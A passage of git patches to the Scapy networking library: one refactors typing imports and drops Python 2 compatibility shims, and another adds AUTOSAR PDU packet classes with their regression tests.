from scapy.fields import ByteEnumField, StrField, ConditionalField, \ @@ -18,11 +22,12 @@ from scapy.error import log_loading from scapy.utils import PeriodicSenderThread from scapy.contrib.isotp import ISOTP -from scapy.compat import Dict, Union -""" -UDS -""" +# Typing imports +from typing import ( + Dict, + Union, +) try: if conf.contribs['UDS']['treat-response-pending-as-answer']: diff --git a/scapy/contrib/automotive/uds_logging.py b/scapy/contrib/automotive/uds_logging.py index cad7827a491..bb791c9ba32 100644 --- a/scapy/contrib/automotive/uds_logging.py +++ b/scapy/contrib/automotive/uds_logging.py @@ -14,9 +14,13 @@ UDS_RTE, UDS_RTEPR, UDS_RFTPR, UDS_IOCBI, UDS_RDBI, UDS_RMBA, UDS_WDBI, \ UDS_CDTCS, UDS_CDTCSPR, UDS_SDT, UDS_SDTPR, UDS_RUPR from scapy.packet import Packet -from scapy.compat import Tuple, Any from scapy.contrib.automotive.ecu import Ecu +from typing import ( + Any, + Tuple, +) + @Ecu.extend_pkt_with_logging(UDS_DSC) def UDS_DSC_get_log(self): diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 7a0308dccf6..8552a5d1af3 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -16,10 +16,7 @@ from collections import defaultdict -from typing import NamedTuple - -from scapy.compat import Dict, Optional, List, Type, Any, Iterable, \ - cast, Union, orb, Set, Sequence +from scapy.compat import orb from scapy.contrib.automotive import log_automotive from scapy.packet import Raw, Packet from scapy.error import Scapy_Exception @@ -42,6 +39,21 @@ # TODO: Refactor this import from scapy.contrib.automotive.uds_ecu_states import * # noqa: F401, F403 +# typing imports +from typing import ( + Dict, + Optional, + NamedTuple, + List, + Type, + Any, + Iterable, + cast, + Union, + Set, + Sequence, +) + # Definition outside the class UDS_RMBASequentialEnumerator # to allow pickling diff --git a/scapy/contrib/automotive/xcp/scanner.py b/scapy/contrib/automotive/xcp/scanner.py index d2968783b62..af952004848 100644 --- a/scapy/contrib/automotive/xcp/scanner.py +++ b/scapy/contrib/automotive/xcp/scanner.py @@ -7,7 +7,6 @@ # scapy.contrib.status = loads import logging from collections import namedtuple -from scapy.compat import Optional, List, Type, Iterator from scapy.config import conf from scapy.contrib.automotive import log_automotive @@ -18,6 +17,14 @@ from scapy.contrib.automotive.xcp.xcp import CTORequest, XCPOnCAN from scapy.contrib.cansocket_native import CANSocket +# Typing imports +from typing import ( + Optional, + List, + Type, + Iterator, +) + XCPScannerResult = namedtuple('XCPScannerResult', 'request_id response_id') diff --git a/scapy/contrib/cansocket_native.py b/scapy/contrib/cansocket_native.py index 36fa60f833a..ba9ef0ff440 100644 --- a/scapy/contrib/cansocket_native.py +++ b/scapy/contrib/cansocket_native.py @@ -20,7 +20,17 @@ from scapy.packet import Packet from scapy.layers.can import CAN, CAN_MTU, CAN_FD_MTU from scapy.arch.linux import get_last_packet_timestamp -from scapy.compat import List, Dict, Type, Any, Optional, Tuple, raw, cast +from scapy.compat import raw + +from typing import ( + List, + Dict, + Type, + Any, + Optional, + Tuple, + cast, +) conf.contribs['NativeCANSocket'] = {'channel': "can0"} diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index 4c08e394d13..d8196ca25cb 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -23,8 +23,15 @@ from scapy.layers.can import CAN from scapy.packet import Packet from scapy.error import warning -from scapy.compat import List, Type, Tuple, Dict, Any, \ - Optional, cast +from typing import ( + List, + Type, + Tuple, + Dict, + Any, + Optional, + cast, +) from can import Message as can_Message from can import CanError as can_CanError diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index 000c2d70414..08edfea3e32 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -27,8 +27,16 @@ # Only required if using mypy-lang for static typing # Most symbols are used in mypy-interpreted "comments". # Sized must be one of the superclasses of a class implementing __len__ -from scapy.compat import Optional, List, Union, Callable, Any, \ - Tuple, Sized, Pattern # noqa: F401 +from typing import ( + Optional, + List, + Union, + Callable, + Any, + Tuple, + Sized, + Pattern, +) from scapy.base_classes import Packet_metaclass # noqa: F401 import scapy.fields as fields diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 3f2228e7eed..77e4d0f7af9 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -11,7 +11,6 @@ import struct import socket -from scapy.compat import Optional, Union, Tuple, Type, cast from scapy.contrib.isotp import log_isotp from scapy.packet import Packet from scapy.error import Scapy_Exception @@ -22,6 +21,15 @@ from scapy.contrib.isotp.isotp_packet import ISOTP from scapy.layers.can import CAN_MTU, CAN_FD_MTU, CAN_MAX_DLEN, CAN_FD_MAX_DLEN +# Typing imports +from typing import ( + Optional, + Union, + Tuple, + Type, + cast, +) + LIBC = ctypes.cdll.LoadLibrary(find_library("c")) # type: ignore CAN_ISOTP = 6 # ISO 15765-2 Transport Protocol diff --git a/scapy/contrib/isotp/isotp_packet.py b/scapy/contrib/isotp/isotp_packet.py index 5c6a4d626cd..391b62ec28c 100644 --- a/scapy/contrib/isotp/isotp_packet.py +++ b/scapy/contrib/isotp/isotp_packet.py @@ -9,7 +9,6 @@ import struct import logging -from scapy.compat import Optional, List, Tuple, Any, Type, cast from scapy.packet import Packet from scapy.fields import BitField, FlagsField, StrLenField, \ ThreeBytesField, XBitField, ConditionalField, \ @@ -18,6 +17,16 @@ from scapy.layers.can import CAN from scapy.error import Scapy_Exception +# Typing imports +from typing import ( + Optional, + List, + Tuple, + Any, + Type, + cast, +) + log_isotp = logging.getLogger("scapy.contrib.isotp") CAN_MAX_IDENTIFIER = (1 << 29) - 1 # Maximum 29-bit identifier diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index b21add51a20..b5b38e3670f 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -11,7 +11,6 @@ from threading import Event -from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict, Any from scapy.packet import Packet from scapy.compat import orb from scapy.layers.can import CAN @@ -20,6 +19,17 @@ from scapy.contrib.isotp.isotp_packet import ISOTPHeader, ISOTPHeaderEA, \ ISOTP_FF, ISOTP +# Typing imports +from typing import ( + Any, + Dict, + Iterable, + List, + Optional, + Tuple, + Union, +) + log_isotp = logging.getLogger("scapy.contrib.isotp") diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 2a98eb575ca..52100b008d9 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -15,8 +15,6 @@ from threading import Thread, Event, RLock -from scapy.compat import Optional, Union, List, Tuple, Any, Type, cast, \ - Callable, TYPE_CHECKING from scapy.packet import Packet from scapy.layers.can import CAN from scapy.error import Scapy_Exception @@ -28,6 +26,18 @@ from scapy.contrib.isotp.isotp_packet import ISOTP, CAN_MAX_DLEN, N_PCI_SF, \ N_PCI_CF, N_PCI_FC, N_PCI_FF, ISOTP_MAX_DLEN, ISOTP_MAX_DLEN_2015 +# Typing imports +from typing import ( + Optional, + Union, + List, + Tuple, + Any, + Type, + cast, + Callable, + TYPE_CHECKING, +) if TYPE_CHECKING: from scapy.contrib.cansocket import CANSocket diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index 9b8fce0031e..9f15193aa8c 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -10,14 +10,24 @@ import struct -from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict, Any, \ - Type from scapy.utils import EDecimal from scapy.packet import Packet from scapy.sessions import DefaultSession from scapy.contrib.isotp.isotp_packet import ISOTP, N_PCI_CF, N_PCI_SF, \ N_PCI_FF, N_PCI_FC +# Typing imports +from typing import ( + Iterable, + Optional, + Union, + List, + Tuple, + Dict, + Any, + Type, +) + class ISOTPMessageBuilderIter(object): """ diff --git a/scapy/contrib/postgres.py b/scapy/contrib/postgres.py index 895ad9aa6f7..fb72d3d53b0 100644 --- a/scapy/contrib/postgres.py +++ b/scapy/contrib/postgres.py @@ -7,7 +7,12 @@ import struct -from scapy.compat import Optional, Callable, Any, Tuple # noqa: F401 +from typing import ( + Optional, + Callable, + Any, + Tuple, +) from scapy.fields import ( ByteField, CharEnumField, diff --git a/scapy/contrib/roce.py b/scapy/contrib/roce.py index c927d1e67f1..9a6683cefa1 100644 --- a/scapy/contrib/roce.py +++ b/scapy/contrib/roce.py @@ -19,7 +19,10 @@ from scapy.error import warning from zlib import crc32 import struct -from scapy.compat import Tuple + +from typing import ( + Tuple +) _transports = { 'RC': 0x00, diff --git a/scapy/contrib/tcpao.py b/scapy/contrib/tcpao.py index 406bf5b5145..6f18aee9d8a 100644 --- a/scapy/contrib/tcpao.py +++ b/scapy/contrib/tcpao.py @@ -9,7 +9,7 @@ """Packet-processing utilities implementing RFC5925 and RFC5926""" import logging -from scapy.compat import orb, Union +from scapy.compat import orb from scapy.layers.inet import IP, TCP from scapy.layers.inet import tcp_pseudoheader from scapy.layers.inet6 import IPv6 @@ -18,6 +18,10 @@ import socket import struct +from typing import ( + Union, +) + logger = logging.getLogger(__name__) diff --git a/scapy/dadict.py b/scapy/dadict.py index 8062f0bf692..20bea016638 100644 --- a/scapy/dadict.py +++ b/scapy/dadict.py @@ -10,7 +10,7 @@ from scapy.error import Scapy_Exception from scapy.compat import plain_str -from scapy.compat import ( +from typing import ( Any, Dict, Generic, diff --git a/scapy/data.py b/scapy/data.py index f6bb34eaf99..7e7f4ab8a7c 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -17,7 +17,7 @@ from scapy.error import log_loading from scapy.compat import plain_str -from scapy.compat import ( +from typing import ( Any, Callable, Dict, diff --git a/scapy/error.py b/scapy/error.py index c5df0679587..533a6c3a47b 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -20,7 +20,7 @@ # Typing imports from logging import LogRecord -from scapy.compat import ( +from typing import ( Any, Dict, Tuple, diff --git a/scapy/fields.py b/scapy/fields.py index c0f89b6e098..d6f632c8dc7 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -40,7 +40,7 @@ from scapy.error import warning # Typing imports -from scapy.compat import ( +from typing import ( Any, AnyStr, Callable, diff --git a/scapy/interfaces.py b/scapy/interfaces.py index 53d01e9eb8e..879cdb95a5e 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -18,7 +18,8 @@ # Typing imports import scapy -from scapy.compat import ( +from scapy.compat import UserDict +from typing import ( Any, DefaultDict, Dict, @@ -28,7 +29,6 @@ Tuple, Type, Union, - UserDict, ) diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 36e25c02798..0c02c3c4496 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -13,10 +13,8 @@ import gzip import struct -from scapy.compat import Tuple, Optional, Type, List, Union, Callable, IO, \ - Any, cast, hex_bytes, chb - from scapy.config import conf +from scapy.compat import chb, hex_bytes from scapy.data import DLT_CAN_SOCKETCAN from scapy.fields import FieldLenField, FlagsField, StrLenField, \ ThreeBytesField, XBitField, ScalingField, ConditionalField, LenField, ShortField @@ -28,6 +26,19 @@ from scapy.supersocket import SuperSocket from scapy.utils import _ByteStream +# Typing imports +from typing import ( + Tuple, + Optional, + Type, + List, + Union, + Callable, + IO, + Any, + cast, +) + __all__ = ["CAN", "SignalPacket", "SignalField", "LESignedSignalField", "LEUnsignedSignalField", "LEFloatSignalField", "BEFloatSignalField", "BESignedSignalField", "BEUnsignedSignalField", "rdcandump", diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 8196cf37b02..9dc1a19d9ff 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -31,7 +31,7 @@ from scapy.layers.inet6 import IPv6, DestIP6Field, IP6Field -from scapy.compat import ( +from typing import ( Any, Optional, Tuple, diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index cdee4b31bc7..954cb65c868 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -60,7 +60,8 @@ _NTLMPayloadField, ) -from scapy.compat import ( +# Typing imports +from typing import ( Dict, Tuple, ) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 0fd1f0e23e5..c0da4e4d324 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -61,7 +61,9 @@ from scapy.sendrecv import sendp, srp, srp1, srploop from scapy.utils import checksum, hexdump, hexstr, inet_ntoa, inet_aton, \ mac2str, valid_mac, valid_net, valid_net6 -from scapy.compat import ( + +# Typing imports +from typing import ( Any, Callable, Dict, @@ -74,6 +76,8 @@ cast, ) from scapy.interfaces import NetworkInterface + + if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index c17d0a985b0..badfd752340 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -57,7 +57,8 @@ from scapy.layers.tls.crypto.hash import Hash_MD5 -from scapy.compat import ( +# Typing imports +from typing import ( Any, Callable, Dict, diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 93d0131ced2..8121bb24cfa 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -26,7 +26,7 @@ from scapy.layers.tls.crypto.prf import PRF # Typing imports -from scapy.compat import Dict +from typing import Dict def load_nss_keys(filename): diff --git a/scapy/main.py b/scapy/main.py index 9d0dd6c6789..25860a941a0 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -34,7 +34,7 @@ from scapy.themes import DefaultTheme, BlackAndWhite, apply_ipython_style from scapy.consts import WINDOWS -from scapy.compat import ( +from typing import ( Any, Dict, List, diff --git a/scapy/modules/nmap.py b/scapy/modules/nmap.py index c00d7a43863..38a0521fff9 100644 --- a/scapy/modules/nmap.py +++ b/scapy/modules/nmap.py @@ -26,9 +26,18 @@ from scapy.layers.inet import IP, TCP, UDP, ICMP, UDPerror, IPerror from scapy.packet import NoPayload, Packet from scapy.sendrecv import sr -from scapy.compat import plain_str, raw, Dict, List, Tuple, Optional, cast, Union +from scapy.compat import plain_str, raw from scapy.plist import SndRcvList, PacketList +# Typing imports +from typing import ( + Dict, + List, + Tuple, + Optional, + cast, + Union, +) if WINDOWS: conf.nmap_base = os.environ["ProgramFiles"] + "\\nmap\\nmap-os-fingerprints" # noqa: E501 diff --git a/scapy/packet.py b/scapy/packet.py index 31f8bc6ea1c..e5e06571d1c 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -47,7 +47,7 @@ from scapy.libs.test_pyx import PYX # Typing imports -from scapy.compat import ( +from typing import ( Any, Callable, Dict, @@ -60,10 +60,10 @@ Type, TypeVar, Union, - Self, Sequence, cast, ) +from scapy.compat import Self try: import pyx diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 49bfcc5e868..f3278d2a3d4 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -19,7 +19,7 @@ from scapy.config import conf from scapy.utils import get_temp_file, do_graph -from scapy.compat import ( +from typing import ( Any, Callable, Dict, diff --git a/scapy/plist.py b/scapy/plist.py index 1449e014060..e888e5662f3 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -12,7 +12,6 @@ from collections import defaultdict from typing import NamedTuple -from scapy.compat import lambda_tuple_converter from scapy.config import conf from scapy.base_classes import ( BasePacket, @@ -26,7 +25,7 @@ from functools import reduce # typings -from scapy.compat import ( +from typing import ( Any, Callable, DefaultDict, @@ -203,12 +202,6 @@ def summary(self, :param lfilter: truth function to apply to each packet to decide whether it will be displayed """ - # Python 2 backward compatibility - if prn is not None: - prn = lambda_tuple_converter(prn) - if lfilter is not None: - lfilter = lambda_tuple_converter(lfilter) - for r in self.res: if lfilter is not None: if not lfilter(*r): @@ -230,12 +223,6 @@ def nsummary(self, :param lfilter: truth function to apply to each packet to decide whether it will be displayed """ - # Python 2 backward compatibility - if prn is not None: - prn = lambda_tuple_converter(prn) - if lfilter is not None: - lfilter = lambda_tuple_converter(lfilter) - for i, res in enumerate(self.res): if lfilter is not None: if not lfilter(*res): @@ -257,9 +244,6 @@ def filter(self, func): function has to take a packet as the only argument and return a boolean value. """ - # Python 2 backward compatibility - func = lambda_tuple_converter(func) - return self.__class__([x for x in self.res if func(*x)], name="filtered %s" % self.listname) @@ -299,11 +283,6 @@ def plot(self, MATPLOTLIB_DEFAULT_PLOT_KARGS ) - # Python 2 backward compatibility - f = lambda_tuple_converter(f) - if lfilter is not None: - lfilter = lambda_tuple_converter(lfilter) - # Get the list of packets if lfilter is None: lst_pkts = [f(*e) for e in self.res] @@ -384,11 +363,6 @@ def multiplot(self, MATPLOTLIB_DEFAULT_PLOT_KARGS ) - # Python 2 backward compatibility - f = lambda_tuple_converter(f) - if lfilter is not None: - lfilter = lambda_tuple_converter(lfilter) - # Get the list of packets if lfilter is None: lst_pkts = (f(*e) for e in self.res) diff --git a/scapy/pton_ntop.py b/scapy/pton_ntop.py index 1556b27ec4c..8c4129ae748 100644 --- a/scapy/pton_ntop.py +++ b/scapy/pton_ntop.py @@ -15,7 +15,8 @@ import binascii from scapy.compat import plain_str, hex_bytes, bytes_encode, bytes_hex -from scapy.compat import Union +# Typing imports +from typing import Union _IP6_ZEROS = re.compile('(?::|^)(0(?::0)+)(?::|$)') _INET6_PTON_EXC = socket.error("illegal IP address string passed to inet_pton") diff --git a/scapy/route.py b/scapy/route.py index 0bbce677185..cb36fa181ab 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -14,7 +14,7 @@ from scapy.interfaces import resolve_iface from scapy.utils import atol, ltoa, itom, pretty_list -from scapy.compat import ( +from typing import ( Any, Dict, List, diff --git a/scapy/route6.py b/scapy/route6.py index 8fc34bd79cd..82ff58584d5 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -25,7 +25,7 @@ from scapy.error import warning, log_loading from scapy.utils import pretty_list -from scapy.compat import ( +from typing import ( Any, Dict, List, diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index f2b7e82747e..9311eda22f2 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -16,7 +16,7 @@ from scapy.utils import ContextManagerSubprocess, PcapReader, PcapWriter from scapy.supersocket import SuperSocket -from scapy.compat import ( +from typing import ( Any, Callable, List, diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 95c34cae66c..bad1096757f 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -37,7 +37,7 @@ from scapy.supersocket import SuperSocket, IterSocket # Typing imports -from scapy.compat import ( +from typing import ( Any, Callable, Dict, diff --git a/scapy/sessions.py b/scapy/sessions.py index 9eb2ad8c4aa..8317204060f 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -17,7 +17,7 @@ from scapy.pton_ntop import inet_pton # Typing imports -from scapy.compat import ( +from typing import ( Any, Callable, DefaultDict, diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 6f76b44d346..32526d78476 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -31,7 +31,7 @@ # Typing imports from scapy.interfaces import _GlobInterfaceType -from scapy.compat import ( +from typing import ( Any, Iterator, List, diff --git a/scapy/themes.py b/scapy/themes.py index b44a5767f0a..b293021718c 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -14,7 +14,7 @@ import html import sys -from scapy.compat import ( +from typing import ( Any, Callable, List, diff --git a/scapy/tools/automotive/isotpscanner.py b/scapy/tools/automotive/isotpscanner.py index 37f6626eb18..e66d7122375 100755 --- a/scapy/tools/automotive/isotpscanner.py +++ b/scapy/tools/automotive/isotpscanner.py @@ -15,7 +15,13 @@ from scapy.config import conf from scapy.consts import LINUX -from scapy.compat import Tuple, Optional, Any + +# Typing imports +from typing import ( + Tuple, + Optional, + Any, +) if not LINUX or conf.use_pypy: conf.contribs['CANSocket'] = {'use-python-can': True} diff --git a/scapy/utils.py b/scapy/utils.py index 6a2ce087934..b882b01f923 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -35,13 +35,20 @@ from scapy.config import conf from scapy.consts import DARWIN, OPENBSD, WINDOWS from scapy.data import MTU, DLT_EN10MB, DLT_RAW -from scapy.compat import orb, plain_str, chb, bytes_base64,\ - base64_bytes, hex_bytes, lambda_tuple_converter, bytes_encode +from scapy.compat import ( + orb, + plain_str, + chb, + bytes_base64, + base64_bytes, + hex_bytes, + bytes_encode, +) from scapy.error import log_runtime, Scapy_Exception, warning from scapy.pton_ntop import inet_pton # Typing imports -from scapy.compat import ( +from typing import ( cast, Any, AnyStr, @@ -50,7 +57,6 @@ IO, Iterator, List, - Literal, Optional, TYPE_CHECKING, Tuple, @@ -58,6 +64,7 @@ Union, overload, ) +from scapy.compat import Literal if TYPE_CHECKING: from scapy.packet import Packet @@ -3004,9 +3011,6 @@ def __make_table( vz = {} # type: Dict[Tuple[str, str], str] vxf = {} # type: Dict[str, str] - # Python 2 backward compatibility - fxyz = lambda_tuple_converter(fxyz) - tmp_len = 0 for e in data: xx, yy, zz = [str(s) for s in fxyz(*e)] diff --git a/scapy/utils6.py b/scapy/utils6.py index e6861cebadb..ed3f93a0462 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -24,7 +24,7 @@ from scapy.error import warning, Scapy_Exception from functools import reduce, cmp_to_key -from scapy.compat import ( +from typing import ( Iterator, List, Optional, diff --git a/scapy/volatile.py b/scapy/volatile.py index a89bee2725c..3c48300a4b2 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -22,7 +22,7 @@ from scapy.compat import bytes_encode, chb, plain_str from scapy.utils import corrupt_bits, corrupt_bytes -from scapy.compat import ( +from typing import ( List, TypeVar, Generic, diff --git a/test/regression.uts b/test/regression.uts index 4506bd65db2..ed0e8a26bef 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4560,7 +4560,7 @@ def test_multiplot(mock_plt): mock_plt.plot = fake_plot tmp = [IP(id=i)/TCP() for i in range(10)] plist = PacketList([tuple(tmp[i-2:i]) for i in range(2, 10, 2)]) - lines = plist.multiplot(lambda x: (x[1][IP].src, (x[1].time, x[1][IP].id))) + lines = plist.multiplot(lambda x, y: (y[IP].src, (y.time, y[IP].id))) assert len(lines) == 1 assert len(lines[0]) == 4 diff --git a/test/testsocket.py b/test/testsocket.py index 81e71e16acf..8017bfef98f 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -17,7 +17,16 @@ from scapy.data import MTU from scapy.packet import Packet from scapy.error import Scapy_Exception -from scapy.compat import Optional, Type, Tuple, Any, List, cast + +# Typing imports +from typing import ( + Optional, + Type, + Tuple, + Any, + List, + cast, +) from scapy.supersocket import SuperSocket From 0925ada485406684174d6f068dbd85c4154657b3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Damian=20Zar=C4=99ba?= Date: Mon, 24 Apr 2023 21:21:37 +0200 Subject: [PATCH 1020/1632] Add AUTOSAR PDUTransport/PDU with initial batch of tests (#3933) * Add AUTOSAR PDUTransport/PDU with initial batch of tests * Expand tests with building PDUTransport for 1 and many PDUs. --------- Co-authored-by: KhazAkar --- scapy/contrib/automotive/autosar/__init__.py | 11 +++ scapy/contrib/automotive/autosar/pdu.py | 47 +++++++++++++ test/configs/bsd.utsc | 1 + test/configs/linux.utsc | 1 + test/configs/solaris.utsc | 1 + test/configs/windows.utsc | 1 + test/configs/windows2.utsc | 1 + test/contrib/automotive/autosar/pdu.uts | 71 ++++++++++++++++++++ 8 files changed, 134 insertions(+) create mode 100644 scapy/contrib/automotive/autosar/__init__.py create mode 100644 scapy/contrib/automotive/autosar/pdu.py create mode 100644 test/contrib/automotive/autosar/pdu.uts diff --git a/scapy/contrib/automotive/autosar/__init__.py b/scapy/contrib/automotive/autosar/__init__.py new file mode 100644 index 00000000000..b9fa5216c34 --- /dev/null +++ b/scapy/contrib/automotive/autosar/__init__.py @@ -0,0 +1,11 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Damian Zaręba + +# scapy.contrib.status = skip + +""" +Package of contrib automotive AUTOSAR modules +that have to be loaded explicitly. +""" diff --git a/scapy/contrib/automotive/autosar/pdu.py b/scapy/contrib/automotive/autosar/pdu.py new file mode 100644 index 00000000000..8ff3805764f --- /dev/null +++ b/scapy/contrib/automotive/autosar/pdu.py @@ -0,0 +1,47 @@ +#! /usr/bin/env python + +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Damian Zaręba + +# scapy.contrib.description = AUTOSAR PDU packets handling package. +# scapy.contrib.status = loads +from typing import Tuple, Optional +from scapy.layers.inet import UDP +from scapy.fields import IntField, XIntField, PacketListField +from scapy.packet import Packet, bind_bottom_up + + +class PDU(Packet): + """ + Single PDU Packet inside PDUTransport list. + Contains ID and payload length, and later - raw load. + It's free to interpret using bind_layers/bind_bottom_up method + + Based off this document: + + https://www.autosar.org/fileadmin/standards/classic/22-11/AUTOSAR_SWS_IPDUMultiplexer.pdf # noqa: E501 + """ + name = 'PDU' + fields_desc = [ + XIntField('pdu_id', 0), + IntField('pdu_payload_len', 0)] + + def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] + return s[:self.pdu_payload_len], s[self.pdu_payload_len:] + + +class PDUTransport(Packet): + """ + Packet representing PDUTransport containing multiple PDUs + FIXME: Support CAN messages as well. + """ + name = 'PDUTransport' + fields_desc = [ + PacketListField("pdus", [PDU()], PDU) + ] + + +bind_bottom_up(UDP, PDUTransport, dport=60000) diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index 170fa0f664d..b437cc7159c 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -8,6 +8,7 @@ "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", "test/contrib/automotive/xcp/*.uts", + "test/contrib/automotive/autosar/*.uts", "test/contrib/*.uts" ], "remove_testfiles": [ diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index 87d6b71c649..f43e870c136 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -10,6 +10,7 @@ "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", "test/contrib/automotive/xcp/*.uts", + "test/contrib/automotive/autosar/*.uts", "test/tls/tests_tls_netaccess.uts" ], "remove_testfiles": [ diff --git a/test/configs/solaris.utsc b/test/configs/solaris.utsc index ada75031993..d76e8b77a4f 100644 --- a/test/configs/solaris.utsc +++ b/test/configs/solaris.utsc @@ -8,6 +8,7 @@ "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", "test/contrib/automotive/xcp/*.uts", + "test/contrib/automotive/autosar/*.uts", "test/contrib/*.uts" ], "remove_testfiles": [ diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 0f7ad559324..c065cb604cb 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -9,6 +9,7 @@ "test\\contrib\\automotive\\bmw\\*.uts", "test\\contrib\\automotive\\xcp\\*.uts", "test\\contrib\\automotive\\*.uts", + "test\\contrib\\automotive\\autosar\\*.uts", "test\\contrib\\*.uts" ], "remove_testfiles": [ diff --git a/test/configs/windows2.utsc b/test/configs/windows2.utsc index 1435cd8047a..e82fe0f8575 100644 --- a/test/configs/windows2.utsc +++ b/test/configs/windows2.utsc @@ -6,6 +6,7 @@ "test\\contrib\\automotive\\gm\\*.uts", "test\\contrib\\automotive\\bmw\\*.uts", "test\\contrib\\automotive\\*.uts", + "test\\contrib\\automotive\\autosar\\*.uts", "tls\\tests_tls_netaccess.uts", "contrib\\*.uts" ], diff --git a/test/contrib/automotive/autosar/pdu.uts b/test/contrib/automotive/autosar/pdu.uts new file mode 100644 index 00000000000..3167cdd8142 --- /dev/null +++ b/test/contrib/automotive/autosar/pdu.uts @@ -0,0 +1,71 @@ +% Regression tests for the PDUTransport / PDU layer + + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ + ++ PDUTransport contrib tests + += Load Contrib Layer + +load_contrib("automotive.autosar.pdu", globals_dict=globals()) + += Defaults test + +p = PDUTransport() +assert p.pdus == [PDU()] + +p = PDU() +assert p.pdu_id == 0 +assert p.pdu_payload_len == 0 + += Build test pdu_id +p = PDU(bytes(PDU(pdu_id=0x11))) +assert len(bytes(p)) == 8 +assert p.pdu_id == 0x11 +assert p.pdu_payload_len == 0 + += Build test pdu_payload_len +p = PDU(bytes(PDU(pdu_payload_len=12))) +assert len(p) == 8 +assert p.pdu_id == 0 +assert p.pdu_payload_len == 12 + += Build test id and payload len with data +p = PDU(bytes(PDU(pdu_id=0x12, pdu_payload_len=2) / Raw(b'\x22\x33'))) +assert len(p) == 10 +assert p.pdu_id == 0x12 +assert p.pdu_payload_len == 2 +assert len(p['Raw']) == 2 +assert bytes(p['Raw']) == b'\x22\x33' + += Build PDUTransport with multiple PDU packets +p1 = PDUTransport(b'\x00\x00\x00\x01\x00\x00\x00\x01\x11' +b'\x00\x00\x00\x02\x00\x00\x00\x02\x11\x44' +b'\x00\x00\x00\x03\x00\x00\x00\x03\x11\x33\x91') +p2 = PDUTransport(bytes(PDUTransport(pdus=[PDU(pdu_id=0x1,pdu_payload_len=1)/Raw(b'\x11'), # noqa: E501 +PDU(pdu_id=0x2, pdu_payload_len=2) / 